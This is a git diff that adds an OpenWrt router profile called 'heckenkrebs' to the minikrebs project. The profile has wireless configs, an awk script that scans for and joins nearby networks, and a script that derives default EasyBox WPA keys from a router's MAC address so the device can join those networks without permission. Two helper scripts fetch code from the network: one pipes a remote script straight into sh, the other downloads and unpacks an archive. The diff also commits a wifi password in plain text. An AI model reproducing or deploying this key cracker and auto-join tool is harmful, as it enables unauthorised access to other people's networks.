diff options
Diffstat (limited to 'minikrebs/profiles/heckenkrebs')
13 files changed, 230 insertions, 0 deletions
diff --git a/minikrebs/profiles/heckenkrebs/custom_make b/minikrebs/profiles/heckenkrebs/custom_make new file mode 100755 index 00000000..4694530b --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/custom_make @@ -0,0 +1,2 @@ +#!/bin/sh +make image PROFILE=TLWR703 PACKAGES="tinc curl kmod-ipv6 kmod-fs-ext4 radvd ip wireless-tools block-mount kmod-usb-core kmod-usb2 kmod-usb-storage -kmod-ppp -kmod-pppoe -kmod-pppox -ppp -ppp-mod-pppoe" FILES=customfiles/ diff --git a/minikrebs/profiles/heckenkrebs/customfiles/etc/config/network b/minikrebs/profiles/heckenkrebs/customfiles/etc/config/network new file mode 100644 index 00000000..2feb7400 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/etc/config/network @@ -0,0 +1,17 @@ + +config interface 'loopback' + option ifname 'lo' + option proto 'static' + option ipaddr '127.0.0.1' + option netmask '255.0.0.0' + +config interface 'lan' + option ifname 'eth0' + option type 'bridge' + option proto 'static' + option ipaddr '192.168.1.1' + option netmask '255.255.255.0' + +config interface 'wan' + option ifname 'wlan0' + option proto 'dhcp' diff --git a/minikrebs/profiles/heckenkrebs/customfiles/etc/config/wireless b/minikrebs/profiles/heckenkrebs/customfiles/etc/config/wireless new file mode 100644 index 00000000..d2dc5a37 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/etc/config/wireless @@ -0,0 +1,18 @@ + +config wifi-device 'radio0' + option type 'mac80211' + option hwmode '11ng' + option path 'platform/ar933x_wmac' + option htmode 'HT20' + list ht_capab 'SHORT-GI-20' + list ht_capab 'SHORT-GI-40' + list ht_capab 'RX-STBC1' + list ht_capab 'DSSS_CCK-40' + +config wifi-iface + option device 'radio0' + option network 'wan' + option encryption 'none' + option mode 'sta' + option ssid 'linksys' + diff --git a/minikrebs/profiles/heckenkrebs/customfiles/etc/dropbear/authorized_keys b/minikrebs/profiles/heckenkrebs/customfiles/etc/dropbear/authorized_keys new file mode 120000 index 00000000..9c87fc52 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/etc/dropbear/authorized_keys @@ -0,0 +1 @@ +/root/.ssh/authorized_keys
\ No newline at end of file diff --git a/minikrebs/profiles/heckenkrebs/customfiles/etc/rc.local b/minikrebs/profiles/heckenkrebs/customfiles/etc/rc.local new file mode 100644 index 00000000..9b8eb564 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/etc/rc.local @@ -0,0 +1,7 @@ +# Put your custom commands here that should be executed once +# the system init finished. By default this file does nothing. + +tincd -n retiolum 2>/dev/null +aap & + +exit 0 diff --git a/minikrebs/profiles/heckenkrebs/customfiles/etc/wifiblack b/minikrebs/profiles/heckenkrebs/customfiles/etc/wifiblack new file mode 100644 index 00000000..e69de29b --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/etc/wifiblack diff --git a/minikrebs/profiles/heckenkrebs/customfiles/etc/wifipw b/minikrebs/profiles/heckenkrebs/customfiles/etc/wifipw new file mode 100644 index 00000000..d235df78 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/etc/wifipw @@ -0,0 +1 @@ +shack;weissichnichtbinnochneuhierfragmalralf diff --git a/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/aap b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/aap new file mode 100755 index 00000000..75e1cbfe --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/aap @@ -0,0 +1,115 @@ +#!/usr/bin/awk -f + +BEGIN { + chan=0; + essid=""; + encr=0; + psk2=0; + psk=0; + i=0; + # find interface - start by finding if in sta mode + while( "uci show wireless" | getline) { + if(/mode=sta/) { + split($0,wl,"."); + iface=wl[2]; + } + } + close("uci show wireless") + "uci get wireless." iface ".device" | getline radio + close("uci get wireless." iface ".device") + system("ifconfig wlan0 up") + for(;;){ + while( "iwlist wlan0 scan" | getline ) { + scan[i++]=$0; + } + close("iwlist wlan0 scan") + for (j=0;j<i;j++) { + $0=scan[j]; + if ($1 == "Cell" || $1 == EOF ) { + if(chan == 0) continue; + #get mac + mac=$5 + # we're at the end of a record + # process data we have and try to connect + if(psk2 == 1) crypt = "psk2"; + else if (psk == 1) crypt ="psk"; + else if (encr == 1) crypt = "wep"; + else crypt = "none"; + psk=0; + psk2=0; + encr=0; + rkey=""; + # first we see if we're in blacklist + bl="0" + "cat /etc/wifiblack | grep \"" essid "$\"" | getline bl + close("cat /etc/wifiblack | grep \"" essid "$\"") + if ( bl == "1" ) { + print essid " blacklisted"; + continue; + } + # now we get key if we're encrypted + if ( crypt != "none" ) { + "cat /etc/wifipw | grep \"" essid ";\" | sed 's/[^;]*;//' " | getline rkey + close("cat /etc/wifipw | grep \"" essid ";\" | sed 's/.*;//' ") + if ( rkey == "" ) { + m=match(essid,"EasyBox"); + if (RLENGTH > 0) { + "easybox_keygen " mac | getline rkey + close("easybox_keygen " mac) + } + else { + print essid " is encrypted and key not in whitelist"; + continue; + } + } + } + system("uci set wireless." radio ".channel=" channel); + system("uci set wireless." iface ".ssid=" essid); + if (crypt == "none") { + system("uci set wireless." iface ".encryption=none"); + system("uci -q delete wireless." iface ".key"); + } + else { + system("uci set wireless." iface ".key=" rkey); + system("uci set wireless." iface ".encryption=" crypt); + } + system("uci show wireless > /tmp/keepalive"); + system("wifi up"); + while(system("sleep 60; wget -q -T 30 -O /dev/null http://google.com/index.html") == 0) { + system("ledoff") + } + } + else { + # now test for the things we want + # channel + if (/Channel:[0-9]/) { + m=match($0,"Channel"); + if (RSTART > 0) { + s=substr($0,m); + n=match(s,/[0-9]+/); + chan=substr(s,n,RLENGTH) + } + continue; + } + # we don't need else as we break on successful find + if (/^ *ESSID/) { + m=match($0,"\".*\""); + if (RSTART > 0) essid=substr($0,m+1,RLENGTH-2); + continue; + } + if (/^ *Encryption key:on/) { + encr = 1; + continue; + } + if (/^ *IE: IEEE 802.11i\/WPA2/) { + psk2=1; + continue; + } + if (/^ *IE: WPA /) { + psk=1; + continue; + } + } + } + } + } diff --git a/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/easybox_keygen b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/easybox_keygen new file mode 100755 index 00000000..e9a9beca --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/easybox_keygen @@ -0,0 +1,40 @@ +#!/bin/sh +# +# easybox_keygen.sh (c) 2012 GPLv3 +# +# www.wotan.cc +# + +MAC=$1 + +# Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal. + +take5=${MAC:12} +last4=${take5/:/} + +# Fill up to 4 places with zeros, if necessary: +deci=$(printf "%04d" "0x$last4" | sed 's/.*\(....\)/\1/;s/./& /g') +#echo M4: ${deci[@]} +# +# The digits M9 to M12 are just the last digits (9.-12.) of the MAC: +hexi=$(echo ${MAC:12:5} | sed 's/://;s/./& /g') +#echo 'M4 (Hex): ' ${hexi[@]} +# K1 = last byte of (d0 + d1 + h2 + h3) +# K2 = last byte of (h0 + h1 + d2 + d3) +c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) +c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) +K1=$((($c1)%16)) +K2=$((($c2)%16)) +#printf "K1: %x\n" $K1 +#printf "K2: %x\n" $K2 +X1=$((K1^${deci:6:1})) +X2=$((K1^${deci:4:1})) +X3=$((K1^${deci:2:1})) +Y1=$((K2^0x${hexi:2:1})) +Y2=$((K2^0x${hexi:4:1})) +Y3=$((K2^0x${hexi:6:1})) +Z1=$((0x${hexi:4:1}^${deci:6:1})) +Z2=$((0x${hexi:6:1}^${deci:4:1})) +Z3=$((K1^K2)) +printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F + diff --git a/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/infest b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/infest new file mode 100755 index 00000000..f1bcc594 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/infest @@ -0,0 +1,4 @@ +#!/bin/sh +printf "enter your tincname:" +read HOSTNAME +curl tinc.krebsco.de | HOSTN=$HOSTNAME sh diff --git a/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/ledoff b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/ledoff new file mode 100755 index 00000000..0bc6ec7a --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/ledoff @@ -0,0 +1,2 @@ +#!/bin/sh +echo 0 > /sys/class/leds/tp-link\:blue\:system/brightness diff --git a/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/tinc-update b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/tinc-update new file mode 100755 index 00000000..2c6ec432 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/customfiles/usr/bin/tinc-update @@ -0,0 +1,4 @@ +#!/bin/sh +if test -e /etc/tinc/retiolum; then + if ping -c 1 euer.krebsco.de -W 5 &>/dev/null; then (curl http://euer.krebsco.de/retiolum/supernodes.tar.gz | tar xz -C /etc/tinc/retiolum/hosts/);fi +fi diff --git a/minikrebs/profiles/heckenkrebs/doc/README.md b/minikrebs/profiles/heckenkrebs/doc/README.md new file mode 100644 index 00000000..8972d4b8 --- /dev/null +++ b/minikrebs/profiles/heckenkrebs/doc/README.md @@ -0,0 +1,19 @@ +# Heckenkrebs +Heckenkrebs is the automatic internet-establish and gateway provider for the +krebs darknet. + +This profile will automatically establish wireless connections to shared wireless networks. If you want the Krebs to connect to your wlan you need to add your wireless credentials to /etc/wifipw. Syntax is $SSID;$PW +W-Lans can be blacklisted by adding the ssid to /etc/wifiblack + +run infest on the system to get into the retiolum darknet (requires internet) +hostsfiles for tinc can be updated with tinc-update + +the LED will turn off after 60 seconds of working internet connection to save power + +# Functionality +The Heckenkrebs will use the aap tool to connect randomly to wireless networks +which are unprotected in some ways. + +aap is patched to calculate default easybox keys in addition to try open +networks. It also provides a blacklist and access-point password list. + |